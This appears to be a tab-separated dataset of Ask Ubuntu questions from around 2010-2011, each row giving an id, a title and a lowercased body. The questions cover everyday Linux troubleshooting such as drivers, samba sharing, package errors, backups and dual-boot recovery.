17680	is there an alternative to xword for doing ny times crosswords ?	i love doing the new york times crosswords , and have had a subscription to the online site for over a decade . on windows and mac , they use the acrosslite program from litsoft , but their linux version has n't been maintained , and i do n't even know if it 's still available . i know there 's xword , but it does n't support all the newer features of acrosslite , like allowing more than one letter per square ( a frequent trick in the sunday puzzles ) . i 've tried the windows version of acrosslite under wine , but it 's surprisingly bad . edit ( 02/11/2011 ) i contacted litsoft directly to see if they were ever planning on making the linux version available again . i received a response right away from a developer . i 'm quoting directly from the email : yes , across lite for linux will be available again sometime in 1q2011 . we are currently working on a v1.2 re-compile for newer unix distros as a first-step and will later evolve it to 2.0 version . we tried an adobe air version for all platforms other than windows and mac but the user experience was terrible partly because of adobe air issues so we went back to the native version . hence the delay .
17689	ubuntu jeos like minimal image for server with jre	i need to create minimalistic server appliance for running on amazon ec2 ( ami ) . i tried debootstrap . its coming upto 200+ mb , its same with vmbuilder also . are there any ways of getting it down to 100mb or less . i just need it with bare minimum linux os + jre . the smaller the size the better . any suggestion regards
17690	why do i need ./ to run an application ?	i wrote a little hello world program . when i tried to run a.out , i got `` command not found '' . when i ran ./a.out , it worked fine . where can i learn about why that was ?
17695	is it possible to hide drag handles in non-expanded gnome panel ?	i 've just started using dockbarx in place of awn , and i 'm liking the simplicity of it . the one thing i 've found that irritates me is the visible drag handles in the panel . ( my awn setup had no panels . ) is there any setting that will hide them ? here 's what i 'm talking about ; outlined in red :
17697	when is it appropriate to use `dump` vs `rsync` ?	when is it appropriate to use dump vs rsync for backups ?
17702	user guide for users migrating from windows ?	i am new user for ubuntu . i want to use ubuntu for my python development . i used windows7 for .net development . is there any guide which help me in migration from windows to ubuntu ?
17708	how to assign the ' web browser shortcut ' to synapse ?	my laptop has three extra keys , for opening mail client , web browser and one other . i dont use them , so i want to assign the the web browser key to open synapse , currently i use super+space to open synapse but now that i do n't use the extra key given to open the web browser , i want to assign that key to open synapse , is it possible ? i looked into the 'keyboard shortcuts ' and saw that xf86www was written as shortcut next to launch web browser .
17713	require sudo password for shutdown for one session	i have a computer running ubuntu that is used by multiple people . it spends a lot of time powered off . on occasion , i would like to start it up using wake-on-lan , connect via ssh and start a job in the background . i do not want the pc to shutdown while this job is running . however , since there are multiple people who might use this pc , someone could walk up to the machine , log in , check their email or whatever and then shut the pc down . alternatively , someone might notice that it is switched on and showing the gdm log-in screen and decide to shut it down . is there a way to prevent this from happening ? it does n't have to make it completely impossible : just making the computer pop up a window saying `` are you really sure ( jobs are running in the background ) ? '' would do perfectly well . however , it must work both from the gnome menu after log-in and from the gdm screen .
17715	what program is good for designing a poster ?	im trying to make people on my school use ubuntu , so the school gave me 4 computers , now i 've set them up and the computers work great ... however , nobody seem to be able to use them , because of their disability to make a simple \ so i have to tell them on a poster , because probably everyone will forget if i just tell them ... so what programs are good for designing a 2d poster to print out ?
17722	can i get by without a panel ?	i feel my panel is pretty redundant . i use gnome-do as a launcher and i use exposăš to check what windows i have open . the only thing in there that i need a panel for is network manager/notifications . is there a way of managing notifications without having any visible `` bar '' ?
17723	trim the terminal command prompt working directory	when using the terminal in a deep folder structure sometimes the prompt can take up most of the line . is there any way in which i can trim the working directory ? i know i can do ps1= '' \w > '' to only print the current directory and not the full path , but is there a way to have something like : /home/smauel/de ... ther/folder >
17730	how to integrate java web start to browser ?	i have sun-java6-plugin installed on my 10.10 amd64 , and i tested on the java website that it works with applets . however it does n't work with web start - i have to download the jnlp file and double click to open . is there a way to integrate web start to my browsers ?
17734	is it possible to setup a shortcut for enable/disable wifi ?	is it possible to setup a shortcut for enable/disable wifi ?
17742	toggle wireless network settings with a little script	i want the ability to toggle between two wireless states : only connect to access point a , disconnect from anything else right now , try to connect to ap-a . only connect to ap-b or ap-c , disconnect from ap-a , try to connect to anything allowed . the second halves of each could easily be the same code ( disconnect from everything , connect to anything allowed ) but how do i script the first bit ? this can be achieved manually by opening the connections settings screen , editing a connection , and toggling the `` connect automatically '' checkbox .
17745	how to remove a deb without removing its dependencies	i would like to install the most recent version of boto , which i do via python setup.py install yet when i try to remove the old version the following packages also get removed : apt-get remove python-boto reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : cloud-init cloud-utils euca2ools python-boto how can i tell the package manager to remove boto , and them mark it as installed externally ( or something like that ) so that apt wo n't try to fix the missing dependency ? thank you , maxim .
17747	why is n't there a useful jboss package ?	why is n't there a jboss package available ? tomcat is well-served , but what passes for a jboss package in ubuntu is completely useless . edit since people answering do n't seem to have bothered looking into the package in question , let me detail my answer by showing it : $ dpkg -l jbossas4 / . /usr /usr/share /usr/share/doc /usr/share/doc/jbossas4 /usr/share/doc/jbossas4/readme.debian /usr/share/doc/jbossas4/copyright /usr/share/doc/jbossas4/changelog.debian.gz /usr/share/java /usr/share/java/jboss-run-4.2.3.ga.jar /usr/share/java/jboss-shutdown-4.2.3.ga.jar /usr/share/java/jboss-run.jar /usr/share/java/jboss-shutdown.jar $ cat /usr/share/doc/jbossas4/readme.debian jbossas4 is currently in a very alpha stage of packaging . i can be used to build other libraries depending on jboss like libhibernate3-java but it is not complete and can not be used as an application server yet . -- torsten werner < twerner @ debian.org > mon , 19 nov 2007 16:53:36 +0100
17751	how do i turn my source code into an ubuntu package and how do i get it in the repositories ?	i have written a program in c and i wish to create an ubuntu .deb package . how do i do this ? how do i get it included in the ubuntu official repositories ?
17757	install disk is n't finishing	so i have tried installing ubuntu 10.10 on an empty hard drive and i will get all the way to the slide show and after some time it goes to a screen with vertical lines on it kinda like it is stalling out and nothing happens after words . i was successful in getting all the way to the menu that say 's it must restart and went to restart it and it said there was no disk i even went to the boot menu and selected the appropriate drive to boot from thinking maybe it had something to do with that . any suggestions on how to solve this problem would be appreciated
17762	copy-and-paste is often corrupted	i have ubuntu 10.10 with the 64-bit desktop version . when i copy-and-paste into any window , including firefox , terminal , java swing app , remote desktop , often i get 4 random letters ( a 32-bit value ? ) if i try to copy again it may work this time or i might get another corrupt sequence . this happen more often than not . i have tried to search for a solution but it does n't appear to be a common problem . any suggestions on what i should try next to fix this ? it appears that copying twice helps ^c^c often works . edit : i have traced the problem to using remote desktop to a tightvnc server . when this is running the copy/paste does n't work well . when i do n't that this running there is no problem .
17764	how can i check the integrity of a downloaded ubuntu cd ?	i 've just downloaded a cd image of ubuntu . i know the installer has a check cd option , but how can i check that the image is good before burning it to cd ?
17767	nautilus elementary wont show `` main toolbar ''	and it wont come back . going to view > main toolbar has no effect ( it is always `` on '' ) and i dont see no buttons . last thing i remember doing was installing elementary theme , then after i restarted , i saw no toolbar .
17770	share across network to windows users	i have a folder i want to share with a couple windows users on the network . i am using ubuntu 10.4 when i right click a folder i go to `` sharing options '' there are 3 check boxes . if i check the first 2 which are `` share this folder '' and `` allow others to create and delete files in this folder '' i can now see this folder on the network from my pc . i can not access it though , it asks for a username and password ( i never set one up so i do n't even know what credentials it wants . ) i do n't want to have to log in , i just want to be able to go right in . so if i check the third box , which is `` guest access '' i can now access the folder from my pc . but so can everyone else on the network . i just want myself and a couple other pc users on the network to be able to access it . i do not see anyplace where i can specify what users on the network have permission to access it ? how do i do that ? update when i entered my user name and password for the linux machine , it gave me this error message : \linux-server\saga_repo is not accessible . you might not have permission to use this network resource . contact the administrator of this server to find out if you have access permissions . multiple connections to a server or shared resource by the same user , using more than one user name , are not allowed . disconnect all previous connections to the server or shared resource and try again . i noticed that when type in my username it defaults to @ my-domain so i also tried myuser @ linux-server but still got the same message . also the domain administrator ( who knows nothing about linux ) told me that the linux machine is not a part of the domain ( even though i can see it when i go to my network places from my windows machine ) . i do n't know if that means anything . i also tried created a new user on ubuntu to try to log in with and got the same message . i tried to log in with my user and the new user from a workers machine and i could n't get in from there either but i just got an `` access denied '' dialog everytime on his machine . is there possibly another step i am missing ?
17773	will my current gnome desktop be preserved when upgrading to 11.04	i was wondering since ubuntu 11.04 will include unity as the default interface , if ( when the time comes ) i upgrade to 11.04 from 10.10 will my current desktop setup be preserved somewhere , so in case i do not like unity i can simply switch back to my gnome desktop
17774	physically check ram without rebooting the server ?	i have a production ubuntu server in a remote location , which recently started to behave strangely . i suspect ram errors , and want to have a physical ram check without rebooting , live cds or memtests which causes downtime . i know that on-line ram test is a contradiction in terms ( because a full physical check requires that no process will be running ) , but i wonder if there is any way to make a random physical check which might give some indication of ram failure . thanks , adam
17775	how to show proper time in ubuntu software centre history	there were some occasions when i needed to know the time i installed or uninstalled something from the ubuntu software centre so that i can diagnose some problem . it is great that the time is shown under history there , even up to the second . however the am/pm is not shown and the time is not given in the 24-hour clock format . is there a way to configure it to show the am/pm or 24-hour clock ? update : the am/pm is now shown .
17784	corrupted/messed up icons on gnome-panel	sometimes when i start my computer my gnome panel where my notification icons are is sometimes screwed with icons overlapping or not appearing at all . sometimes my taskbar is also affected where by their is a white gap between the show desktop button and taskbar where open programs appear . any ideas on how to stop this ?
17787	what does ign mean in update manager ?	when i run update from the terminal , i get the following list where many repositories are shown with `` ign '' . does it mean the update manager will always ignore updates from those repositories ? apart from some repositories that i 've disabled manually , all others are checked in my software sources . i 'd like to receive updates from many of those sources . below is the output of my apt-get update : http : //paste.ubuntu.com/544545/
17789	how to disable gui root login ?	sometime ago i just tested to see if i could login to desktop from root , and i succeeded . i clicked on others on the userlist and entered root and its password and logged in . now i 'd like to know how we can disable root login altogether . i did n't see any option as such in the login screen .
17791	can i downmix stereo audio to mono ?	i have one speaker next to my computer which i use mostly as a headphone amplifier . on occasion i need to use it as a loudspeaker . is it possible to quickly change the audio output from stereo to mono , either system-wide or as a plugin for a media player ?
17795	what are `` select-by-word '' characters ?	what are the `` select-by-word '' in gnome-terminal 's preferences ?
17799	open source terminal server to replace ms terminal server	does anybody know an alternative ms terminal server for ubuntu which can be used for connection of windows thin clients ? it is a big advantage if there are no limitation for a number of connected thin clients . thank you for possible recomendations and support .
17802	how to find the final target of a daisy-chain of symbolic links ?	i needed to issue several commands to follow a chain of symbolic links to the final target . is there a command which will do it in a single step ? which updatedb /usr/bin/updatedb ls -l /usr/bin/updatedb lrwxrwxrwx 1 root root 26 2010-09-01 16:22 /usr/bin/updatedb - > /etc/alternatives/updatedb ls -l /etc/alternatives/updatedb lrwxrwxrwx 1 root root 25 2010-09-01 16:21 /etc/alternatives/updatedb - > /usr/bin/updatedb.mlocate ls -l /usr/bin/updatedb.mlocate -rwxr-xr-x 1 root root 34492 2010-03-24 21:16 /usr/bin/updatedb.mlocate
17803	how do i browse a website that uses webgl ?	i want to run this site : http : //www.zygotebody.com/ but , it says that webgl is required . how do i install it ? i have firefox version 3.6.13 and chromium version 8.0.552.215 .
17806	how do i disable irqbalance ?	the title says it all really . i do n't want to just kill something that seems so close to the bare metal , and sudo service irqbalance stop says stop : unknown instance : -- what am i missing ? should i be disabling it somewhere and rebooting ?
17808	screen goes black after vga change	my old gf 8600 went dead some weeks ago . while i waited for my new card , i used an old trident pci card to use the desktop . i could use windows but not ubuntu , but i still removed several nvidia drivers using the command line : getting an old trident video accelerator 9440 to work two days ago i got my new card , a radeon hd 5670 . i reinstalled windows , as it crippled itself because of the driver change ( i use dual boot ) . the windows install killed grub , so i reinstalled it using this : http : //linuxpoison.blogspot.com/2010/10/how-to-restore-grub-2-after.html after that , my three windows partitions could not be mounted during load time ( guess that 's because their mount folders are missing ) , and skipping the mount process lead me to a freezing black screen , so i commented the lines on fstab with nano . then i restarted ubuntu , but it keeps locking up at the black screen . i guess ubuntu is thinking i still have a gf , or it simply misses the nvidia display drivers . i googled around , but could n't find any tip to solve my problem . i know ubuntu recognizes the card , as i can use live cd perfectly . any help is welcome ! edit : my fstab : http : //paste.ubuntu.com/545356/ my xorg.conf : http : //paste.ubuntu.com/545357/ my xorg.0.log : http : //paste.ubuntu.com/545358/ as i can see , i 'm still hooked to nvidia . how can i wipe it out ?
17810	booting with livecd not working saying that it can not mount /dev/loop0	i wanted to try ubuntu so i was going to partition my hard drive so i restart my computer with my live cd in the disc drive when it boots it shows the typical booting screen for about ten minutes then the screen goes to text only and says that it ca n't mount/dev/loop0 first i type help then i type mount /dev/loop0 then it says fstab can not be found and i do n't know were to go from there i have seen numerous times that it could be a ram problem i am not someone who knows much about memory so this is a snippet from my dell inspiron 8500 memory memory module connector two user-accessible sodimm sockets memory module capacities 256 mb , 512 mb , and 1024 mb memory type 266-mhz ddr sdram standard memory 256 mb maximum memory 2 gb
17812	what is the best way to keep all your files when moving from windows to ubuntu ?	i 've been planning to change my os to ubuntu , but my hard disk contains 750gb of files ( in two ntfs partitions : 250gb and 700gb ) . i know that it is possible to keep the larger partition and install ubuntu to the remaining space , but i would like to know if it is efficient to read an ntfs partition from within ubuntu , and whether there are better ways .
17821	how to install ( or mock ) internet explorer ?	i need to install a windows application , which checks if there is internet explorer of at least 5th version installed and refuses to install ( while i believe it does not really need it to work ) if it is not . i 've tried winetricks to install ie 8 , 7 , 6 full , 6 versions it offers - none worked - versions 7 and 8 installers report a function missing in msvcr ( installing all msvcr versions did n't help ) , ie6 report some other error ( i 'll specify if it matters ) . i 've also tried ies4linux - it also fails , complaining for a `` badidchoice '' x window system error received by ies4linux-gtk.py . is there a way to install any ie version in ubuntu 10.10 with wine or to mock its presence ? i do n't even need it to work , just to be installed in the wine system so that other windows programs could see it 's there . i use ubuntu 10.10 with wine 1.3.8 .
17822	can i install unity on 10.04 ?	i do n't have any problem with gnome , it 's actualy great , but wan na testing same thing new , how ?
17823	how to list all installed packages ?	i 'd like to output a list of all installed packages into a text file , so that i can review it and bulk-install on another system . how to do this ?
17824	dpkg error while downloading	i tried to install wine . since it was taking more than an hour i restarted the system . i found the following error when i tried to open synaptic package manager . e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . e : _cache- > open ( ) failed , please report . due to this error i could not open synaptic manager.hence i could not even add anything to repositories . i have to install many other softwares and i am stuck now . how to solve this ? please help
17828	is there any [ yahoo + gmail + hotmail ] `` widget '' notifier ?	a notifier for all the three if it 's possible beside the clock ... i 'm using ubuntu 10.04 with gnome 2.30.2 . thank you .
17834	is itoa ( ) available in stdlib.h in gcc > =4.1 ?	that 's my question . i 've gcc 4.4.1 and that function isnât present , i had installed the 4.3 and 4.5 versions with the same result : -/ i know that this function is not the c-ansi standard , but i did n't write the code and i need compile it in my distro . a friend of mine had the same version of the compiler in fedora , and gcc compiles with no problem ( using stdio.h and stdlib.h ) . so if someone can tell me if the function is/is n't available in my compiler.. i 'd be thankful . greetings . btw : this my gcc version : : ~ $ gcc -v using built-in specs . target : i686-linux-gnu configured with : ../src/configure -v -- with-pkgversion='ubuntu/linaro 4.4.4-14ubuntu5 ' -- with-bugurl=file : ///usr/share/doc/gcc-4.4/readme.bugs -- enable-languages=c , c++ , fortran , objc , obj-c++ -- prefix=/usr -- program-suffix=-4.4 -- enable-shared -- enable-multiarch -- enable-linker-build-id -- with-system-zlib -- libexecdir=/usr/lib -- without-included-gettext -- enable-threads=posix -- with-gxx-include-dir=/usr/include/c++/4.4 -- libdir=/usr/lib -- enable-nls -- with-sysroot=/ -- enable-clocale=gnu -- enable-libstdcxx-debug -- enable-objc-gc -- enable-targets=all -- disable-werror -- with-arch-32=i686 -- with-tune=generic -- enable-checking=release -- build=i686-linux-gnu -- host=i686-linux-gnu -- target=i686-linux-gnu thread model : posix gcc version 4.4.5 ( ubuntu/linaro 4.4.4-14ubuntu5
17841	will python2.7 be available for 10.04 in the future ?	since ubuntu 10.04 is an lts release will it support python 2.7 as a default package maintainer version or at least have a python2.7 package in future ? since it will be the last major python 2.x release and is intended to remain in place for a long time , i decided to use it . i compiled it from source ( after building deps of course ) but now and then i find small problems . is it safe to define my compiled python 2.7 as the default , as there are some distribution applications that work on python .
17843	windows 7 style backup ?	with windows 7 i can easily set up a scheduled backup , which will incrementally backup directories i have selected , as well as create a disk image , all whilst i am still using my pc . is there anything even approaching the level of seamless convenience and quality of the volume shadow copy service ( vss ) for ubuntu ?
17846	seemed be lost everything after installed ubuntu in my windows 7 computer	i was trying to install ubuntu in my windows 7 with separate partition , and i made a cd for ubuntu 10.10 and installed into my computer . but after i installed ubuntu i do n't see any option for windows 7 . it seems like i lost everything my important documents . is there any way i could get back my files . please help me out .
17850	is ubuntu one getting a new logo to coincide with the new ( ish ) branding ?	seems by now ubuntu one should update thier logo to match the branding introduced in april .
17851	login screen never appears	i am not able to log in to ubuntu . when i start my laptop and select ubuntu , the screen with the ubuntu logo and progress bar dots is shown . i wait for some time but it does n't show me the login screen . i have tried to restart it but the same problem occurs . i am new to ubuntu .
17855	when will the dash be implimented in natty development ?	i am currently using natty 11.04 , at updating daily . i was just wondering when the dash will be implimented , as there are some really neat feature ( like zeitgeist , etc . ) that i 'd really like to try out and post bug reports for .
17856	installing mysql ruby gem	hi i am unsuccessfully trying to install mysql gem on ubuntu 10.04 . i have tried the following commands : sudo gem install mysql sudo gem install mysql -- -- with-mysql-config=/usr/bin/mysql_config i get the following message for each : building native extensions . this could take a while ... error : error installing mysql : error : failed to build gem native extension . /usr/bin/ruby1.8 extconf.rb checking for mysql_ssl_set ( ) ... no checking for rb_str_set_len ( ) ... no checking for rb_thread_start_timer ( ) ... no checking for mysql.h ... no checking for mysql/mysql.h ... no *** extconf.rb failed *** could not create makefile due to some reason , probably lack of necessary libraries and/or headers . check the mkmf.log file for more details . you may need configuration options . provided configuration options : -- with-opt-dir -- without-opt-dir -- with-opt-include -- without-opt-include= $ { opt-dir } /include -- with-opt-lib -- without-opt-lib= $ { opt-dir } /lib -- with-make-prog -- without-make-prog -- srcdir= . -- curdir -- ruby=/usr/bin/ruby1.8 -- with-mysql-config -- without-mysql-config gem files will remain installed in /usr/lib/ruby/gems/1.8/gems/mysql-2.8.1 for inspection . results logged to /usr/lib/ruby/gems/1.8/gems/mysql-2.8.1/ext/mysql_api/gem_make.out i 've read on a lot of forums that installing mysql client libraries ( libmysqlclient-dev ) helps fix the above issue , but it does for me . apt-get install libmysqlclient15-dev reading package lists ... done building dependency tree reading state information ... done note , selecting libmysqlclient-dev instead of libmysqlclient15-dev libmysqlclient-dev is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . any help on what else may be the issue would greatly be appreciated . thanks , sharmil
17857	wireless not showing up in network manager applet	there is only the wired connection option available when the menu drops down . i have installed a belkin wireless g card for my desktop . it has been used before on this version of ubuntu 10.10 , but after upgrading it shows only wired networks . enable networking and enable notifications have both been ticked . still only wired networks coming . im using ubuntu 10.10 maverick meerkat on my desktop comp and im an absolute begginer at ubuntu . can some one please help me re enable wireless on my comp ?
17861	restrict access to specific folder on samba	i have network server on ubuntu server with samba . i want to set a password to a specific folder . does anybody know how to do this ?
17862	how do i enable sound access for desktop users ?	i created a secondary user login for my system , but sound playback does not work ? what do you have to change to give user access to sound ?
17863	how do you reset/revert system menus back to defaults ?	there are menu items missing form my system- > preference menu . going to system- > preferences- > main menu , the menu items are not disable , but missing entirely . how do you reset the menus back to defaults ?
17864	ntfs partitions hidden under ext4 file system / partition ... want to recover files from ntfs	i am new to ubuntu , but very impressed with the system . so one day i tried installing ubuntu 10.10 along with windows in dual boot first place it didnt get installed properly and during second attempt i could do it right but oh ... i lost my windows 7 , here is my problem and what i have done till now . i have hdd installed with ubuntu same disk have windows partitions and i need to extract data from those ... very very important i tried to access the same from ubuntu ... can not access it , 3.reinstalled the windows 7 , hdd is not detected 4.during installation ubuntu gone , so reintalled scan in ubuntu says hdd is fine and diskinternals linux reader actual show the ntfs partitions , recovery tool not able to get any data out . , please help i need data from these partitions ... please i feel that i have put ext4 partition on ntfs filesystem ... and now not able to access it
17869	how do i lock/unlock my screen using my iphone and usb dock ?	my iphone is connected via usb to my ubuntu desktop via a dock . how do i configure it so that when i dock my phone the screen is unlocked and when removing it it locks it ?
17870	hidden parts of recently uninstalled software	when i uninstall some software and then reinstall it through ubuntu software centre after a short period of time , the notification says that it is only being installed and not downloaded . however if this is done after a long period of time , it has to be both downloaded and installed . this leads me to two related questions . ( 1 ) is recently uninstalled software hidden in some form in some place so that it is not downloaded again ? ( 2 ) after how long is this cleared so that it has to be downloaded again ?
17873	problems with cisco quickvpn client	i 've bought a cisco rvs4000 router , and have set up vpn on the box . the only way to connect to it seems to be through a client called quickvpn , which cisco only releases for windows . i 've successfully set up the vpn tunnel on my windows partition , but would like to make it work on my ubuntu partition as well . i 've tried to install the quickvpn client through wine , and when i run it , it seems to be connecting . but ... after a little while , the client says `` the remote gateway is not responding . do you want to wait ? '' . if i click yes , it comes back after a little while , and if i click no , it disconnects . if i ping any known ip on the other side of the tunnel while connected , i get no answers . i were thinking it might need some more privileges to create an interface or something like that , but i do n't have any experience with wine , and know that you should never run wine as root or sudo it . i 've also found out that quickvpn uses some kind of ipsec , but that it apparently does something non-standard/proprietary , and therefore is not compatible with the ipsec stack . i 'm all open for suggestions ? : )
17874	two identical usb drives auto-mount with different owner group permissons , but why ?	update : ( solved- sort of } see my answer below i have 2 identical usb drives which i 've both formatted to identical specs using gparted . both have two identical primary partitions ( ext4 and ntfs ) . i have not created any mount-point directories for them . ( an afterthougt : actually i did , but deleted them , so there are none now . and i did manually mount them ( as a test ) ... maybe ( ? ) this has done something ( ? ) but there are now no `` created-by-me '' directories in /media , for these usb drives ) there is no mention of them in /etc/fstab . i want them to auto-mount , and i 'd expect them to mount identically ... ... but for some reason , the ext4 partitions are mounting with different permissions and different group . as can be expected with root : root ownership , and no write permission for group/other , it is causing my rsync backup to fail ( for usb2 ) . what might be causing these different mount settings ? ... ( i 'm using 10.04 ) rsync : failed to set times on `` /media/usb2ext4/ . `` : operation not permitted ( 1 ) rsync : recv_generator : mkdir `` /media/usb2ext4/.trash-1000 '' failed : permission denied ( 13 ) skipping any contents from this failed directory usb1 : 'sudo fdisk -l ' -and- 'ls -l /media ' ========================================== device boot start end blocks id system /dev/sdd1 1 108547 871903746 83 linux /dev/sdd2 108548 121601 104856255 7 hpfs/ntfs drwxrwxr-x 31 root fred 4096 2010-12-17 15:30 usb1ext4 drwx -- -- -- 1 fred fred 4096 2010-12-16 14:04 usb1ntfs usb2 : 'sudo fdisk -l ' -and- 'ls -l /media ' ========================================== device boot start end blocks id system /dev/sde1 1 108547 871903746 83 linux /dev/sde2 108548 121601 104856255 7 hpfs/ntfs drwxr-xr-x 2 root root 4096 2010-12-17 10:19 usb2ext4 drwx -- -- -- 1 fred fred 4096 2010-12-16 14:04 usb2ntfs
17876	dual screens with one workspace on each ?	i have a dual screen , compiz-fusion and i do n't have a nvdia/ati graphic card and i use ubuntu 10.10. i currently use the two monitors : the desktop is stretched across monitors and i can drag an application across monitors . my question follows : i would like to use the left monitor only to display workspace1 and the right monitor to display workspace2 . is this possible ? if yes how ( i 've found mention of dualxscreen on this board , but i ca n't find it in the compizconfig menus ) . best ,
17884	should i install firefox add-ons via the software center or the webbrowser ?	i would like to install some firefox add-ons , also called 'extensions ' or 'plugins ' , like for example adblock plus , ubufox or greasemonkey . should i install them from the mozilla website , using the firefox browser , or should i search firefox in the software center and then select the interesting applications ? i suppose the issue is about how the extensions are kept up-to-date . if your answer is 'via the software center ' , how can i migrate well from my former add-ons without losing all my preferences ?
17885	can you do keyframed speed changes with video ?	i 'm making a video and i want to do keyframed speed changes . that is , i want to have a video gradually get faster or slower at different points . i have been a user of kdenlive for awhile but have unfortunately found that is unable to do this . can any recommend software that can definitely do this ?
17888	how can i test an app in unity without installing ubuntu ?	i want to test my ubuntu app on unity . i tried installing 11.04 on a vmware virtual machine . i get a dialog saying i do n't have 3d support so i ca n't turn on unity . i learn that 3d drivers are not available for ubuntu on vmware . so i figure , i 'll just use the live cd on my computer itself . ( i.e. , no vm . ) i load the live cd , install the nvidia drivers , but then it asks me to restart in order to use the driver . but if i restart , everything is lost because it 's a live cd ! i do n't want to install ubuntu on my computer , i just want to try out my app on it . what can i do ?
17892	failed to load module 'nvidia '	i had very strange issue , i rebooted my pc ( ubuntu 10.10 ) , when the login screen comes back , what ever user i select it expands the password field and collapses it again in less than 1 second . some services like ssh , vnc do n't work so i ca n't login to it remotely , however i can login in tty but still ca n't login via gdm . i tried to reinstall gnome via sudo apt-get install -- reinstall gnome-desktop and many other command about reconfigure gnome , but nothing help . i recorded a video of the problem via my mobile camera ( sorry about the low quality ) some of my error logs xserver log and its the same in the startup error log : ( ww ) warning , could n't open module nvidia ( ee ) failed to load module 'nvidia ' ( module does n't exist , 0 ) ( ee ) no drivers avaliable fatal server error : no screens found and now i was stuck in the recovery mode , normal mode is n't working any more 2- in the recovery mode + failxsafe : i had tried to create a default configuration for my hardware and after a reboot , with no luck the same problem again . 3-i had tried to reinstall nvidia driver as jorge suggested in these setps : sudo apt-get install nvidia-glx-96 /// i took a while sudo nvidi-setting -r to write new config and after reboot nothing changed 4- i tried to install sudo apt-get install nvidia-173 and after reboot the same error , i ran sudo nividia-setting and the new error was error : the control display is undefined , please run nvidia-setting -- help for usage information 5- beofore this problem i was having this bug , but i was n't know any thing about it : screen blanks/monitor turns off using a laptop with a geforce go card , or connecting the sole display via dvi on a dual-head system sometimes results in the screen not receiving a picture . this is caused by the driver outputting video to the vga port on the graphics card , instead of dvi . the usual hint that you have this problem is when you hear the startup sound but nothing appears on the screen . if you do not hear any sound , you are more than likely experiencing unrelated problems . this is a launchpad bug about displays on digital outputs being blank when using nvidia binary driver , and can be resolved by editing your /etc/x11/xorg.conf file : switch to the console ( try using ctrl+alt+f1 , or reboot and select recovery mode from the grub menu . ) use your text editor to open /etc/x11/xorg.conf . ( try sudo nano /etc/x11/xorg.conf ) find the line that says section `` screen '' insert a new line that says option `` usedisplaydevice '' `` dfp '' . save the file . if you had to restart into recovery mode , type reboot , otherwise restart your display using sudo /etc/init.d/gdm restart . and i went to vim /etc/x11/xorg.conf and tada the file is empty . and ubuntu had backup file called xorg.conf.backup , so i went to replace it and reboot ... ... . same error in the video . any help or suggestion is really appreciated .
17894	how can i use an epson stylus c64 printer ?	the epson stylus c64 is a usb printer . how can i install this so that i can print documents ?
17898	unable to change display settings	i have 2 displays and used to have 1 big desktop . now after the last upgrade , my custom settings are not used anymore and i can not change them using the gnome-display-properties . the mirror function keeps being active even when i un-select it . the detect screens function does n't do anything . xorg.conf is missing in /etc/x11 . what could be the cause of this unwanted behaviour ? extra info : $ uname -a linux fornost 2.6.35-20-generic # 29-ubuntu smp fri sep 3 14:55:28 utc 2010 x86_64 gnu/linux $ lspci | grep vga 02:00.0 vga compatible controller : ati technologies inc rv710 [ radeon hd 4350 ] $ lsmod | grep radeon radeon 906842 3 ttm 68180 1 radeon drm_kms_helper 32836 1 radeon drm 206449 5 radeon , ttm , drm_kms_helper i2c_algo_bit 6208 1 radeon $ dpkg -l *radeon* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ naam versie omschrijving +++-======================================-======================================-============================================================================================ ii libdrm-radeon1 2.4.21-1ubuntu2.1 userspace interface to radeon-specific kernel drm services -- runtime ii radeontool 1.6.1-1 utility to control ati radeon backlight functions on laptops ii xserver-xorg-video-radeon 1:6.13.1-1ubuntu5 x.org x server -- amd/ati radeon display driver un xserver-xorg-video-radeonhd < geen > ( geen beschrijving beschikbaar )
17900	how can i print in black and white ?	what option should i select in the ( evince ) print dialog to print in black and white using only the ( cheaper ) black ink cartridge - not black as a composite of other colours ? the options i see in the 'colour ' tab are : 'grayscale' 'inverted grayscale' 'rgb color' 'cmy color' 'cmyk' 'kcmy'
17902	does visual studio express work well with wine ?	i 'm thinking of switching to ubuntu as my primary os , but there 's one big thing i 'm still worried about . for school we have to use microsoft visual studio express to program in c and c++ ( i could just use any other ide but this will be the ide we have to use on the exam ) . so i checked if visual studio express is compatible with wine and it says it is , however my dad ( who used wine in the past ) says he really doubts it 'll work decent . are there any people out there that have experience with wine and vse on ubuntu ?
17903	how to fix hibernate / suspend with proprietary nvidia driver ?	i 've just got an dell precision m6500 that comes with an nvidia card . together with kubunutu 10.10 and the proprietary nvidia driver suspend to disk or ram does not work . it 's allways ending with a running system and a locked screen ( i.e . i can just enter my password and everything is as before - it 's never sleeping ) can someone please help me to debug this issue ? where should i look for information ? none of the log files seem to show an obvious error ...
17907	comparison of various pitivi video editor project settings	i love pitivi video editor for being able to deal with so many different video formats . under project- > project settings- > export to , there are multiple containers , video codecs and audio codecs . what are the pros and cons of these options ?
17909	how to fix broken repository information ?	i have the small red cross icon in my indicator applet , and upon hovering it says that an error occurred while checking for updates . because of this , i ca n't edit the selected repositories through synaptic , which refuses to open the dialog and instead just tries to update the package list . get:1 http : //dl.google.com stable release.gpg [ 197b ] hit http : //archive.ubuntu.com maverick release.gpg ign http : //archive.ubuntu.com/ubuntu/ maverick/main translation-en hit http : //extras.ubuntu.com maverick release.gpg ign http : //extras.ubuntu.com/ubuntu/ maverick/main translation-en hit http : //ppa.launchpad.net maverick release.gpg ign http : //ppa.launchpad.net/elementaryart/ppa/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/elementaryart/ppa/ubuntu/ maverick/main translation-en_gb ign http : //dl.google.com/linux/chrome/deb/ stable/main translation-en hit http : //archive.ubuntu.com/ubuntu/ maverick/main translation-en_gb ign http : //archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en hit http : //archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en_gb ign http : //archive.ubuntu.com/ubuntu/ maverick/restricted translation-en hit http : //archive.ubuntu.com/ubuntu/ maverick/restricted translation-en_gb ign http : //archive.ubuntu.com/ubuntu/ maverick/universe translation-en hit http : //archive.ubuntu.com/ubuntu/ maverick/universe translation-en_gb hit http : //archive.ubuntu.com maverick-updates release.gpg ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/main translation-en ign http : 